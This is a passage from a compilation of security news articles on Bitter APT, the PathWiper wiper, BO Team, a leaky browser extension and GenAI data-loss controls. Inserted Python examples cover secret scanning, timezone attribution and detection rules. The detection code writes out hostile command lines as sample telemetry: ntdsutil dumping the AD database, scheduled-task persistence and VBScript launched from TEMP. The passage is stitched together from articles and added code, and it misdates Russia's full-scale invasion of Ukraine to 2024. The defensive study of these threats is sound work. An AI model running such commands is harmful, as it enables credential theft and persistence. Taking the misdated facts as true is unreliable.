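    for kind, line_no, value in report["secrets"]:
        print(f"{kind} at line {line_no}: {value}")
```

Run it over every .js file in the unpacked extension directory (and over the manifest, whose `host_permissions` reveal which origins the extension expects to talk to). A hit does not always mean a leak, as the Trust Wallet and Ramp responses above illustrate, but each one deserves a documented decision rather than silent acceptance.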

    The findings show how even popular extensions with hundreds of thousands of installations can suffer from trivial misconfigurations and security blunders like hard-coded credentials, leaving users’ data at risk.

    “Users of these extensions should consider removing them until the developers address the insecure [HTTP] calls,” the company said. “The risk is not just theoretical; unencrypted traffic is simple to capture, and the data can be used for profiling, phishing, or other targeted attacks.”

    “The overarching lesson is that a large install base or a well-known brand does not necessarily ensure best practices around encryption. Extensions should be scrutinized for the protocols they use and the data they share, to ensure users’ information remains truly safe.”

    (The story was updated after publication on June 9, 2025, to include responses from Equatio and Trust Wallet.)



    Source: thehackernews.com…

  • Researchers Detail Bitter APT’s Evolving Tactics as Its Geographic Scope Expands

Jun 05, 2025 | Ravie Lakshmanan | Threat Intelligence / Network Security


    The threat actor known as Bitter has been assessed to be a state-backed hacking group that’s tasked with gathering intelligence that aligns with the interests of the Indian government.

    That’s according to new findings jointly published by Proofpoint and Threatray in an exhaustive two-part analysis.

    “Their diverse toolset shows consistent coding patterns across malware families, particularly in system information gathering and string obfuscation,” researchers Abdallah Elshinbary, Jonas Wagner, Nick Attfield, and Konstantin Klinger said.

    Bitter, also known as APT-C-08, APT-Q-37, Hazy Tiger, Orange Yali, T-APT-17, and TA397, has a history of focusing primarily on South Asian entities, with select intrusions also targeting China, Saudi Arabia, and South America.

    In December 2024, evidence emerged of the threat actor’s targeting of Turkey using malware families such as WmRAT and MiyaRAT, indicating a gradual geographical expansion.


    Stating that Bitter frequently singles out an “exceedingly small subset of targets,” Proofpoint said the attacks are aimed at governments, diplomatic entities, and defense organizations so as to enable intelligence collection on foreign policy or current affairs.

    Attack chains mounted by the group typically leverage spear-phishing emails, with the messages sent from providers like 163[.]com, 126[.]com, and ProtonMail, as well as compromised accounts associated with the governments of Pakistan, Bangladesh, and Madagascar.

    The threat actor has also been observed masquerading as government and diplomatic entities from China, Madagascar, Mauritius, and South Korea in these campaigns to entice recipients into malware-laced attachments that trigger the deployment of malware.

    Overview of Bitter’s infection chains

    “Based on the content and the decoy documents employed, it is clear that TA397 has no qualms with masquerading as other countries’ governments, including Indian allies,” the enterprise security company said.

    “While TA397’s targets in these campaigns were Turkish and Chinese entities with a presence in Europe, it signals that the group likely has knowledge and visibility into the legitimate affairs of Madagascar and Mauritius and uses the material in spearphishing operations.”

    Furthermore, Bitter has been found to engage in hands-on-keyboard activity in two distinct campaigns targeting government organizations to conduct further enumeration activities on the targeted hosts and drop additional payloads like KugelBlitz and BDarkRAT, a .NET trojan that was first documented in 2019.

    It features standard remote access trojan capabilities such as gathering system information, executing shell commands, downloading files, and managing files on the compromised host.

    Bitter’s Malware Families

    Some of the other known tools in its arsenal are below –

    • ArtraDownloader, a downloader written in C++ that collects system information and uses HTTP requests to download and execute a remote file
    • Keylogger, a C++ module used in various campaigns to record keystrokes and clipboard content
    • WSCSPL Backdoor, a backdoor that’s delivered via ArtraDownloader and supports commands to get machine information, execute remote instructions, and download and run files
    • MuuyDownloader (aka ZxxZ), a trojan that allows remote code execution of payloads received from a remote server
    • Almond RAT, a .NET trojan that offers basic data gathering functionality and the ability to execute arbitrary commands and transfer files
    • ORPCBackdoor, a backdoor that uses the RPC protocol to communicate with a command-and-control (C2) server and runs operator-issued instructions
    • KiwiStealer, a stealer that searches for files that match a predefined set of extensions, are smaller than 50 MB, and were modified within the past year, and exfiltrates them to a remote server
    • KugelBlitz, a shellcode loader that’s used to deploy the Havoc C2 framework

    It’s worth noting that ORPCBackdoor has been attributed by the Knownsec 404 Team to a threat actor called Mysterious Elephant, which it said overlaps with other India-aligned threat clusters, including SideWinder, Patchwork, Confucius, and Bitter.

Analysis of the hands-on-keyboard activity highlights a “Monday to Friday working hours schedule in Indian Standard Timezone (IST),” which is also consistent with the times at which WHOIS domain registrations and TLS certificate issuances take place.
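The working-hours observation is a reproducible check rather than a judgement call. The script below is an added example and is not Proofpoint's or Threatray's analysis code: given UTC event times (WHOIS registrations, certificate issuance, interactive sessions), it shifts them into candidate UTC offsets and measures how many fall inside a Monday-to-Friday 09:00-18:00 window; the offset with the highest share is the best fit. IST is UTC+05:30 year-round, so a fixed offset represents it exactly; treating the other candidates as fixed offsets ignores daylight saving and is an assumption. The timestamps are constructed.

```python
"""Estimate an operator's working-hours timezone from infrastructure timestamps.

Added example (not the researchers' code). Candidate zones are fixed offsets,
which is exact for IST and an approximation elsewhere; timestamps are constructed.
"""
from datetime import datetime, timedelta, timezone

CANDIDATES = {
    "UTC": timezone.utc,
    "IST (UTC+05:30)": timezone(timedelta(hours=5, minutes=30)),
    "UTC+08:00": timezone(timedelta(hours=8)),
    "UTC-05:00": timezone(timedelta(hours=-5)),
}


def parse_utc(stamp):
    """Parse an ISO-8601 'YYYY-MM-DDTHH:MM:SSZ' string into an aware UTC datetime."""
    return datetime.strptime(stamp, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def in_working_window(local_dt, start_hour=9, end_hour=18):
    """Monday to Friday, start_hour <= local hour < end_hour."""
    return local_dt.weekday() < 5 and start_hour <= local_dt.hour < end_hour


def working_hours_share(utc_events, tz):
    """Fraction of events inside the working window when viewed in tz."""
    if not utc_events:
        return 0.0
    hits = sum(1 for e in utc_events if in_working_window(e.astimezone(tz)))
    return hits / len(utc_events)


def best_fit(utc_events, candidates=CANDIDATES):
    """Return (best_candidate_name, {name: share}) across the candidate offsets."""
    scores = {name: working_hours_share(utc_events, tz) for name, tz in candidates.items()}
    return max(scores, key=scores.get), scores


# Constructed timestamps: eight infrastructure events, seven of which land in
# IST weekday working hours and one on a Saturday.
EVENTS = [parse_utc(s) for s in (
    "2024-12-02T04:45:00Z", "2024-12-03T06:10:00Z", "2024-12-04T09:30:00Z",
    "2024-12-05T11:20:00Z", "2024-12-06T03:40:00Z", "2024-12-07T05:00:00Z",
    "2024-12-09T10:55:00Z", "2024-12-10T12:05:00Z",
)]

if __name__ == "__main__":
    name, scores = best_fit(EVENTS)
    for candidate, share in scores.items():
        print(f"{candidate:16} {share:.2f}")
    print("best fit:", name)
```

Eight events are enough to show the mechanics, not to support attribution; in practice the signal comes from hundreds of registrations and certificates over months, and the half-hour IST offset is what lets it be separated from neighbouring whole-hour zones.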

    “TA397 is an espionage-focused threat actor that highly likely operates on behalf of an Indian intelligence organization,” the researchers said. “There is a clear indication that most infrastructure-related activity occurs during standard business hours in the IST timezone.”



    Source: thehackernews.com…

  • Redefining Cyber Value: Why Business Impact Should Lead the Security Conversation

    Security teams face growing demands with more tools, more data, and higher expectations than ever. Boards approve large security budgets, yet still ask the same question: what is the business getting in return? CISOs respond with reports on controls and vulnerability counts – but executives want to understand risk in terms of financial exposure, operational impact, and avoiding loss.

    The disconnect has become difficult to ignore. The average cost of a breach has reached $4.88 million, according to recent IBM data. That figure reflects not just incident response but also downtime, lost productivity, customer attrition, and the extended effort required to restore operations and trust. The fallout is rarely confined to security.

    Security leaders need a model that brings those consequences into view before they surface. A Business Value Assessment (BVA) offers that model. It links exposures to cost, prioritization to return, and prevention to tangible value.

    This article will explain how a BVA works, what it measures, and why it is becoming essential for organizations that understand that cybersecurity is a key business function, not just an IT issue.

    Why Security Metrics No Longer Translate

    Most security metrics were built for operational teams, not business leaders. CVE counts, patch rates and tool coverage help track progress, but they don’t answer the questions that matter to the board: What would a breach actually cost us? How much risk have we taken off the table? Where does this investment make a difference?

    Traditional metrics fall short for a few key reasons:

    • They show activity, not impact. Saying 3,000 vulnerabilities were fixed last quarter doesn’t explain whether any of them were tied to systems that matter. It tells you what got done – not what got safer. (if you want to learn more about this topic, check out our recent webinar on it – it’s filled with can’t-miss insights into how vanity metrics will throw off your understanding of your security posture, and what to do about it. )
    • They miss how exposures connect. A single misconfiguration might look minor until it combines with an identity issue or a flat network segment. Most metrics don’t reflect how attackers chain weaknesses to reach critical assets.
    • They leave out financial consequences. Breach costs aren’t one-size-fits-all. They depend on everything from detection time and data type to cloud complexity and staffing gaps – factors most dashboards never touch.

    A BVA helps bridge the gap between technical findings and what the business actually needs to understand. It connects exposure data to financial impact, using breach cost modeling grounded in real-world research. Assessments should be based on inputs from sources like the IBM Cost of a Data Breach Report, which outlines factors that shape the cost of an incident – from how quickly a breach is detected to how complex the IT environment is. IBM uses those factors to analyze what a breach costs after the fact – but they can also be used to project what it could cost ahead of time, based on the organization’s actual posture.

    That’s where a BVA comes in. Rather than tracking surface-level metrics, it reframes cybersecurity in terms of outcomes: the conversation moves from counting remediations to showing what those remediations achieved. It offers a clear picture of how exposures lead to impact, what’s at stake, and where security investments can deliver measurable value. That gives security leaders the context they need to support decisions with confidence.

    The Business Value Assessment: What It Measures

    It’s one thing to say a risk has been reduced. It’s another to show what that means in dollars, time, or business impact. That’s what a BVA is purpose-built to do. It connects the dots between security work and outcomes that the rest of the business actually cares about. A BVA should focus on three things:

    • Cost Avoidance – What would a breach likely cost based on the risks in your environment, and how much of that can be prevented by fixing the right exposures?
    • Cost Reduction – Where can security efforts help cut spending? That might include shrinking the scope of manual testing, reducing patching overhead, or improving your insurance profile by showing better risk posture.
    • Efficiency Gains – How much time and effort can you save by giving your team better priorities and automating what doesn’t need a human touch?

    These real-world numbers help security leaders plan better, spend smarter, and make the case when decisions or budgets are on the line.

    Why Delay and Inaction Cost More Than You Think

    The financial impact of a breach increases with every day of delay. Incidents involving identity-based exposures or shadow data now take over 290 days to contain. During that time, businesses experience loss of revenue, stalled operations, and prolonged reputational harm. What’s more, the IBM report shows that 70% of breaches lead to major operational disruption – many of those never fully recover.

    A BVA brings clarity to that timeline. It identifies the exposures most likely to prolong an incident and estimates the cost of that delay based on both your industry and organizational profile. It also helps evaluate the return of preemptive controls. For example, IBM found that companies that deploy effective automation and AI-based remediation see breach costs drop by as much as $2.2 million.

    Some organizations hesitate to act when the value isn’t clearly defined. That delay has a cost. A BVA should include a “cost of doing nothing” model that estimates the monthly loss a company takes on by leaving exposures unaddressed. We’ve found that for a large enterprise, that cost can exceed half a million dollars.

    But understanding the cost of inaction is only half the battle. To truly change outcomes, security leaders need to use that understanding to guide strategy and build cross-functional support.

    The Bottom Line: From Spend to Strategy, BVA Builds Alignment

    There’s no question that security teams are doing the work well. The issue is that traditional metrics don’t always show what their work means. Patch counts and tool coverage aren’t what boards care about. They want to know what’s actually being protected. A BVA helps connect the dots – showing how day-to-day security efforts help the business avoid losses, save time, and stay more resilient.

    It also makes hard conversations easier. Whether it’s justifying a budget, walking the board through risk, or answering questions from insurers, a BVA gives security leaders something solid to point to. It shows where the team is making a difference – cutting down on busywork, reducing third-party testing, and improving how the organization handles risk.

    And most importantly, it gets everyone on the same page. Security, IT, and finance don’t have to guess at each other’s priorities. They can work from the same numbers, focus on what really matters, and move faster when it counts.

    It’s this shift that makes the real difference. Security stops being the team that says “no” and starts being the team that helps the business move forward. With a BVA, leadership finally has a clear way to see progress, make smarter decisions, and deal with risk before it turns into something bigger.

    *****

    Want to see what a BVA can tell you about risk in your organization? Check out the XM Cyber ROI Calculator and start understanding how to avoid losses, save time, and stay more resilient.

    Note: This expert article was contributed by David Lettvin, Inside Channel Account Manager, XM Cyber.

    Found this article interesting? This article is a contributed piece from one of our valued partners. Follow us on Twitter and LinkedIn to read more exclusive content we post.


    Source: thehackernews.com…

  • Inside the Mind of the Adversary: Why More Security Leaders Are Selecting AEV

    Jun 06, 2025 | The Hacker News | Cyber Resilience / Penetration Testing


    Cybersecurity involves playing both the good guy and the bad guy: diving deep into advanced technologies while also going rogue on the Dark Web, and defining technical policies while also profiling attacker behavior. Security teams cannot be focused on just ticking boxes; they need to inhabit the attacker’s mindset.

    This is where AEV comes in.

    AEV (Adversarial Exposure Validation) is an advanced offensive security technology that mimics how adversaries would attack your systems, while also providing remediation strategies. It lets you discover and address how your environment can be exploited and what the impact of that exploitation could be, in a dynamic and ongoing way.

    In this article, we’ll share everything you need to know about AEV, and how your team can leverage it to build continuous resilience against attacks.

    What is AEV?

    According to the Gartner® Market Guide for Adversarial Exposure Validation (March 2025), AEV is defined as “technologies that deliver consistent, continuous, and automated evidence of the feasibility of an attack.” AEV operates by emulating cyber-attacks, providing organizations with an understanding of how attackers can infiltrate their networks. This allows organizations to take relevant security measures to effectively remediate security gaps.

    AEV technologies effectively consolidate previously isolated security testing methods, like Automated Penetration Testing and BAS (Breach and Attack Simulation). Gartner says “As the two markets developed and overlapping capabilities increased, the two functions converged to unite offensive technologies”.

    AEV’s focus is on replicating an actual adversary’s mindset. By combining the breadth of automated pentesting and the impact-driven focus of BAS, AEV enables continuous testing that mirrors how real attackers adapt over time. Organizations can continuously emulate how attackers operate, providing a more insightful confirmation of vulnerabilities and how to best fix them.

    How AEV Supports Exposure Management

    AEV emerged as a technological solution to support CTEM (Continuous Threat Exposure Management) practices. CTEM is an all-encompassing program that helps organizations identify vulnerabilities and exposures, determine the risk profiles of digital assets, prioritize their risk mitigation, and then monitor remediation.

    Here’s how AEV facilitates CTEM:

    • Filtering Mechanism – Instead of generating massive lists of generic findings, AEV narrows the vulnerabilities down to those found to be actually exploitable. This process confirms the legitimacy of security issues and assesses how easily threat actors can reach them. The approach is far more efficient than traditional patch-everything methods, as it flags only the highest-risk issues and, in the process, identifies exposures that are benign and don’t actually warrant remediation.
    • Continuous Nature – Rather than a one-time event or a brief engagement, AEV’s ongoing and frequent automated tests support CTEM’s continuous feedback loop of discovery, testing, and remediation. This helps to ensure a perpetual state of attack readiness even in the face of new threat techniques and as the IT environment changes and new software misconfigurations develop.
    • Real Testing – Staging environments often fail to accurately represent the actual conditions in which attackers would exploit an environment. These include misconfigurations, dormant user accounts, data anomalies, and complex integrations. Some best-of-breed AEV tools address this by testing safely in production environments, making them far more accurate and effective at identifying vulnerabilities that could lead to a disastrous impact.
    • Remediation Beyond Patching – Beyond just patching exploitable CVEs, AEV identifies non-patchable vulnerabilities for remediation, like replacing exposed credentials, implementing the principle of least privilege, fixing misconfigurations, replacing insecure third-party software, and more. This is aligned with CTEM’s remediation guidance, which holistically seeks to reduce exposure to potential threats and risks.

    AEV for Red Teams

    AEV automatically identifies how an attacker might chain together multiple vulnerabilities across different environments. This makes it a staple in any red teamer’s toolkit.

    With AEV, red teams can more easily model attack scenarios. This includes complex ones like attackers hopping between cloud infrastructure and on-prem systems or pivoting through different network segments, while overcoming existing controls and combining low-scoring exposures into a full-scale breach.

    Equipped with information provided by AEV, red teams gain a clear view of how a determined attacker might move laterally, allowing them to scale their efforts and fast-track mitigation. For the organization, AEV ensures cost-effective red-teaming and even allows for entry-level red-teamers to provide quality results. GenAI is expected to augment this even further by providing ideas and explanations for complex attack scenarios.

    AEV for Blue Teams

    For blue teamers, AEV provides a strong head start. With AEV, defenders can see, in the face of an attack, which protections are really robust, which require strengthening, and which controls are in fact redundant. This helps defenders confirm that their security posture is performing at its best, using trend analysis over repeated tests to show that the program works as expected.

    Blue teams can use insights and data from AEV for:

    • Detection stack tuning
    • Preventive posture changes
    • Exposure prioritization
    • Service provider performance validation
    • Security vendor performance scorecards
    • Other operations or controls improvements

    AEV for Security Resilience

    AEV is designed to provide continuous, automated, and realistic simulations of how attackers could exploit weaknesses in an organization’s defenses. No wonder it is quickly emerging as a pivotal technology in cybersecurity. With AEV, security teams are getting that proven validation of how exposures in their environment could be exploited and to what end, enabling smarter prioritization and effective remediation at a faster pace. This necessary clarity is key to fostering cyber resilience.

    To learn more about how to implement AEV, and its role within a wider CTEM practice, register to attend Xposure, Pentera’s Exposure Management Summit.



    Source: thehackernews.com…

  • New PathWiper Data Wiper Malware Disrupts Ukrainian Critical Infrastructure in 2025 Attack

    A critical infrastructure entity within Ukraine was targeted by a previously unseen data wiper malware named PathWiper, according to new findings from Cisco Talos.

    “The attack was instrumented via a legitimate endpoint administration framework, indicating that the attackers likely had access to the administrative console, that was then used to issue malicious commands and deploy PathWiper across connected endpoints,” researchers Jacob Finn, Dmytro Korzhevin, and Asheer Malhotra said in an analysis published Thursday.

    The attack is assessed to be the work of a Russia-nexus advanced persistent threat (APT) actor based on the tradecraft observed and the overlapping capabilities with destructive malware used in attacks against Ukraine.

    Talos said the commands issued by the administrative tool’s console were received by its client running on the victim endpoints and then executed as a batch (BAT) file.

    The BAT file, in turn, consisted of a command to run a malicious Visual Basic Script (VBScript) file in the Windows TEMP folder called “uacinstall.vbs,” which was also pushed to the machines via the administrative console. The VBScript, for its part, dropped the wiper binary under the name “sha256sum.exe” in the same folder and executed it.

    “Throughout the course of the attack, filenames and actions used were intended to mimic those deployed by the administrative utility’s console, indicating that the attackers had prior knowledge of the console and possibly its functionality within the victim enterprise’s environment,” Talos said.

    Once launched, PathWiper is designed to gather a list of connected storage media, including physical drive names, volume names and paths, and network drive paths. The wiper then proceeds to create one thread per drive and volume for every path recorded and overwrites the contents of the artifacts with randomly generated bytes.

    Specifically, it targets the Master Boot Record (MBR) and the NTFS metadata files $MFT, $MFTMirr, $LogFile, $Boot, $Bitmap, $TxfLog, $Tops, and $AttrDef. In addition, PathWiper irrevocably destroys files on disk by overwriting them with randomized bytes and attempts to dismount volumes.


    PathWiper has been found to share some level of similarity with HermeticWiper (aka FoxBlade, KillDisk, or NEARMISS), which was detected coinciding with Russia’s full-scale military invasion of Ukraine in February 2024. The HermeticWiper malware is attributed to the Russia-linked Sandworm group.

    While both wipers attempt to corrupt the MBR and NTFS-related artifacts, it bears noting that HermeticWiper and PathWiper differ in how the data corruption mechanism is applied to the identified drives and volumes.

    “The continued evolution of wiper malware variants highlights the ongoing threat to Ukrainian critical infrastructure despite the longevity of the Russia-Ukraine war,” the researchers said.

    Silent Werewolf Targets Russia and Moldova

    The discovery of a new breed of wiper malware against Ukraine comes as Russian cybersecurity company BI.ZONE uncovered two new campaigns undertaken by Silent Werewolf in March 2025 to infect Moldovan and Russian companies with malware.

    “The attackers employed two separate loader instances to retrieve the malicious payload from their C2 server,” the company said. “Unfortunately, the payload itself was not available at the time of this research. However, a retrospective analysis of similar Silent Werewolf campaigns suggests that the threat actor used XDigo malware.”

    Some of the targets of the attacks include nuclear, aircraft, instrumentation, and mechanical engineering sectors in Russia. The starting point is a phishing email containing a ZIP file attachment that, in turn, includes an LNK file and a nested ZIP archive. The second ZIP file consists of a legitimate binary, a malicious DLL, and a decoy PDF.

    Unpacking and launching the Windows shortcut file triggers the extraction of the nested archive and ultimately causes the rogue DLL to be sideloaded via the legitimate executable (“DeviceMetadataWizard.exe”). The DLL is a C# loader (“d3d9.dll”) that’s designed to retrieve the next-stage payload from a remote server and display the lure document to the victim.

    “The adversaries appear to run checks on target systems,” BI.ZONE said. “If a target host does not meet certain criteria, the Llama 2 large language model (LLM) in GGUF format is downloaded from hxxps://huggingface[.]co/TheBloke/Llama-2-70B-GGUF/resolve/main/llama-2-70b.Q5_K_M.gguf.”

    “This hinders the comprehensive analysis of the entire attack and allows the threat actor to bypass defenses such as sandboxes.”

    The cybersecurity firm said it observed a second campaign that same month targeting unknown sectors in Moldova and, likely, Russia using the same C# loader, but via phishing lures related to official vacation schedules and recommendations for protecting corporate information infrastructure against ransomware attacks.

    The cyber espionage group, per BI.ZONE, is believed to be active at least since 2011, targeting a wide range of companies in Russia, Belarus, Ukraine, Moldova and Serbia. The attacks are characterized by the use of phishing lures to deliver malware such as XDSpy, XDigo, and DSDownloader.

    Pro-Ukrainian Hacktivist Group BO Team Targets Russia

    In recent months, Russian state-owned companies and organizations spanning technology, telecommunications, and production verticals are also said to have come under cyber assaults from a pro-Ukrainian hacktivist group codenamed BO Team (aka Black Owl, Hoody Hyena, and Lifting Zmiy).

    “BO Team is a serious threat aimed both at causing maximum damage to the victim and at extracting financial benefits,” Kaspersky researchers said in a report last week, detailing the threat actor’s ability to sabotage victims’ infrastructure and, in some instances, even resort to data encryption and extortion.

    Active since at least January 2024, attacks mounted by the hacktivist cluster are known to leverage post-exploitation frameworks, including Mythic and Cobalt Strike, as well as legitimate remote access and tunneling tools. The group also has a history of accessing confidential data and publishing information about successful attacks in its Telegram channel BO Team.

    Initial access to target networks is accomplished by sending phishing emails containing booby-trapped attachments that, when opened, activate an infection chain designed to deploy known commodity malware families like DarkGate, BrockenDoor, and Remcos RAT. Also used are tools such as HandleKatz and NanoDump, both of which are used to create dumps of LSASS process memory.


    Armed with the remote access, BO Team has been observed destroying file backups, deleting files using the SDelete utility, and additionally dropping the Windows version of the Babuk encryptor to demand a ransom in exchange for regaining access.

    Some of the other activities carried out by the threat actor are listed below –

    • Setting up persistence using scheduled tasks
    • Assigning malicious component names similar to system or well-known executable files to evade detection
    • Extracting the Active Directory database using ntdsutil
    • Running various commands to collect information about Telegram, running processes, current users, remote RDP sessions, and antivirus software installed on the endpoints
    • Using RDP and SSH protocols to perform lateral movement within Windows and Linux infrastructures
    • Dropping legitimate remote access software like AnyDesk for command-and-control

    “The BO Team group poses a significant threat to Russian organizations due to its unconventional approach to conducting attacks,” Kaspersky said. “Unlike most pro-Ukrainian hacktivist groups, BO Team actively uses a wide arsenal of malware, including backdoors such as BrockenDoor, Remcos, and DarkGate.”

    “These features confirm the high level of autonomy of the group and the absence of stable connections with other representatives of the pro-Ukrainian hacktivist cluster. In the public activity of BO Team, there are practically no signs of interaction, coordination or exchange of tools with other groups. This once again emphasizes its unique profile within the current hacktivist landscape in Russia.”
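    As an added example (not code from Talos, Kaspersky, or either threat actor’s tooling), the following Python triages constructed Windows process-creation telemetry for the PathWiper delivery chain described earlier (a script host running a VBScript from the TEMP folder, then an executable launched from that same folder by the script host) and for two of the BO Team behaviours listed above (Active Directory database extraction with ntdsutil and scheduled-task persistence pointing into a temp directory). The event field names, hostnames, the batch file name, the paths and the severity levels are assumptions; the sample events are constructed and are not indicators from the reports.

```python
"""Rule-based triage of Windows process-creation events (added example).

Field names loosely follow Sysmon Event ID 1 but are an assumption; the events
below are constructed, and the hostnames, batch file name and paths are
placeholders rather than indicators from the Talos or Kaspersky reports."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    host: str
    parent_image: str
    image: str
    command_line: str


# Constructed sample telemetry (placeholders, not real IoCs).
SAMPLE_EVENTS = [
    # Endpoint-management agent runs a batch file pushed through the console
    ProcEvent("ws-01", r"C:\Program Files\AdminAgent\agent.exe",
              r"C:\Windows\System32\cmd.exe",
              r'cmd.exe /c "C:\Windows\Temp\deploy.bat"'),
    # The batch file launches a VBScript from TEMP
    ProcEvent("ws-01", r"C:\Windows\System32\cmd.exe",
              r"C:\Windows\System32\wscript.exe",
              r"wscript.exe C:\Windows\Temp\uacinstall.vbs"),
    # The script runs a binary from TEMP named like a benign utility
    ProcEvent("ws-01", r"C:\Windows\System32\wscript.exe",
              r"C:\Windows\Temp\sha256sum.exe",
              r"C:\Windows\Temp\sha256sum.exe"),
    # Domain controller: AD database export via ntdsutil
    ProcEvent("dc-01", r"C:\Windows\System32\cmd.exe",
              r"C:\Windows\System32\ntdsutil.exe",
              r'ntdsutil.exe "ac i ntds" ifm "create full C:\Temp\out" q q'),
    # Workstation: scheduled task whose action lives in a temp directory
    ProcEvent("ws-02", r"C:\Windows\System32\cmd.exe",
              r"C:\Windows\System32\schtasks.exe",
              r"schtasks.exe /create /sc minute /mo 5 /tn Updater "
              r"/tr C:\Users\alice\AppData\Local\Temp\svc.exe"),
    # Benign noise that must not fire any rule
    ProcEvent("ws-03", r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\notepad.exe", "notepad.exe readme.txt"),
]

TEMP_DIR = re.compile(r"\\temp\\", re.IGNORECASE)
SCRIPT_EXT = re.compile(r"\.(?:vbs|vbe|js|jse|wsf)\b", re.IGNORECASE)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# Both halves of the VBScript -> TEMP binary chain seen on one host
CHAIN = {"script_host_runs_temp_script", "temp_binary_spawned_by_script_host"}


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def check_event(ev: ProcEvent) -> list:
    """Return (rule, severity) pairs that fire for a single event."""
    hits = []
    img, parent = basename(ev.image), basename(ev.parent_image)
    cmd = ev.command_line.lower()
    if img in SCRIPT_HOSTS and TEMP_DIR.search(cmd) and SCRIPT_EXT.search(cmd):
        hits.append(("script_host_runs_temp_script", "medium"))
    if parent in SCRIPT_HOSTS and TEMP_DIR.search(ev.image):
        hits.append(("temp_binary_spawned_by_script_host", "high"))
    if img == "ntdsutil.exe" and re.search(r"\bifm\b", cmd):
        hits.append(("ntds_database_export", "high"))
    if img == "schtasks.exe" and "/create" in cmd and TEMP_DIR.search(cmd):
        hits.append(("scheduled_task_from_temp", "medium"))
    return hits


def triage(events) -> dict:
    """Group hits per host and escalate when the full delivery chain is present."""
    findings = {}
    for ev in events:
        for hit in check_event(ev):
            findings.setdefault(ev.host, []).append(hit)
    for hits in findings.values():
        if CHAIN <= {rule for rule, _ in hits}:
            hits.append(("wiper_delivery_chain", "critical"))
    return findings


if __name__ == "__main__":
    for host, hits in triage(SAMPLE_EVENTS).items():
        for rule, severity in hits:
            print(f"{host}: {severity:8} {rule}")
```

    The per-event rules are deliberately generic (any script host running a script out of a temp directory, any binary launched from a temp directory by a script host) so that renamed payloads still match; the correlation step is what raises the pair to critical, which keeps single noisy events from paging anyone.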



    Source: thehackernews.com…

  • Empower Users and Protect Against GenAI Data Loss

    Jun 06, 2025 | The Hacker News | Artificial Intelligence / Zero Trust


    When generative AI tools became widely available in late 2022, it wasn’t just technologists who paid attention. Employees across all industries immediately recognized the potential of generative AI to boost productivity, streamline communication and accelerate work. Like so many waves of consumer-first IT innovation before it—file sharing, cloud storage and collaboration platforms—AI landed in the enterprise not through official channels, but through the hands of employees eager to work smarter.

    Faced with the risk of sensitive data being fed into public AI interfaces, many organizations responded with urgency and force: They blocked access. While understandable as an initial defensive measure, blocking public AI apps is not a long-term strategy—it’s a stopgap. And in most cases, it’s not even effective.

    Shadow AI: The Unseen Risk

    The Zscaler ThreatLabz team has been tracking AI and machine learning (ML) traffic across enterprises, and the numbers tell a compelling story. In 2024 alone, ThreatLabz analyzed 36 times more AI and ML traffic than in the previous year, identifying over 800 different AI applications in use.

    Blocking has not stopped employees from using AI. They email files to personal accounts, use their phones or home devices, and capture screenshots to input into AI systems. These workarounds move sensitive interactions into the shadows, out of view of enterprise monitoring and protections. The result? A growing blind spot known as Shadow AI.

    Blocking unapproved AI apps may make usage appear to drop to zero on reporting dashboards, but in reality, your organization isn’t protected; it’s just blind to what’s actually happening.

    Lessons From SaaS Adoption

    We’ve been here before. When early software-as-a-service tools emerged, IT teams scrambled to control the unsanctioned use of cloud-based file storage applications. The answer wasn’t to ban file sharing, though; it was to offer a secure, seamless, single-sign-on alternative that matched employee expectations for convenience, usability, and speed.

    However, this time around the stakes are even higher. With SaaS, data leakage often means a misplaced file. With AI, it could mean inadvertently training a public model on your intellectual property with no way to delete or retrieve that data once it’s gone. There’s no “undo” button on a large language model’s memory.

    Visibility First, Then Policy

    Before an organization can intelligently govern AI usage, it needs to understand what’s actually happening. Blocking traffic without visibility is like building a fence without knowing where the property lines are.

    We’ve solved problems like these before. Zscaler’s position in the traffic flow gives us an unparalleled vantage point. We see what apps are being accessed, by whom and how often. This real-time visibility is essential for assessing risk, shaping policy and enabling smarter, safer AI adoption.

    Next, we’ve evolved how we deal with policy. Lots of providers will simply give the black-and-white options of “allow” or “block.” The better approach is context-aware, policy-driven governance that aligns with zero-trust principles that assume no implicit trust and demand continuous, contextual evaluation. Not every use of AI presents the same level of risk and policies should reflect that.

    For example, we can provide access to an AI application with a caution to the user, or allow the transaction only in browser-isolation mode, which means users aren’t able to paste potentially sensitive data into the app. Another approach that works well is redirecting users to a corporate-approved alternative app that is managed on-premises. This lets employees reap productivity benefits without risking data exposure. If your users have a secure, fast, and sanctioned way to use AI, they won’t need to go around you.

    Last, Zscaler’s data protection tools mean we can allow employees to use certain public AI apps, but prevent them from inadvertently sending out sensitive information. Our research shows over 4 million data loss prevention (DLP) violations in the Zscaler cloud, representing instances where sensitive enterprise data—such as financial data, personally identifiable information, source code, and medical data—was intended to be sent to an AI application, and that transaction was blocked by Zscaler policy. Real data loss would have occurred in these AI apps without Zscaler’s DLP enforcement.
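    The tiered handling described above (allow, caution, browser isolation, redirect to a sanctioned app, and a DLP block on sensitive content) is easier to reason about as a single decision function. The following Python is an added example and is not Zscaler’s code or policy engine; the app catalogue, the group names, the decision tiers and the three DLP patterns are assumptions chosen for illustration, and the prompts in the demo are constructed.

```python
"""Context-aware GenAI access decisions with a small DLP check (added example).

The app catalogue, user groups, decision tiers and detection patterns are
assumptions for illustration; nothing here is Zscaler's implementation."""
import re
from dataclasses import dataclass

# Hypothetical app catalogue. The sanctioned app stands in for the
# corporate-managed alternative users are redirected to.
APP_CATALOG = {
    "corp-assistant": {"sanctioned": True, "risk": "low"},
    "translate-bot": {"sanctioned": False, "risk": "low"},
    "public-chat": {"sanctioned": False, "risk": "medium"},
}
SANCTIONED_ALTERNATIVE = "corp-assistant"
UNKNOWN_APP = {"sanctioned": False, "risk": "high"}  # anything not catalogued

# Illustrative DLP patterns; a real deployment uses far richer dictionaries.
DLP_PATTERNS = {
    "private_key": re.compile(r"-----BEGIN (?:RSA |EC )?PRIVATE KEY-----"),
    "card_number": re.compile(r"\b(?:\d[ -]?){13,16}\b"),
    "access_key": re.compile(r"\b(?:sk-[A-Za-z0-9]{20,}|AKIA[0-9A-Z]{16})\b"),
}


@dataclass(frozen=True)
class Request:
    user_group: str   # e.g. "engineering", "finance", "contractor"
    app: str
    payload: str      # text the user is about to submit


def luhn_ok(digits: str) -> bool:
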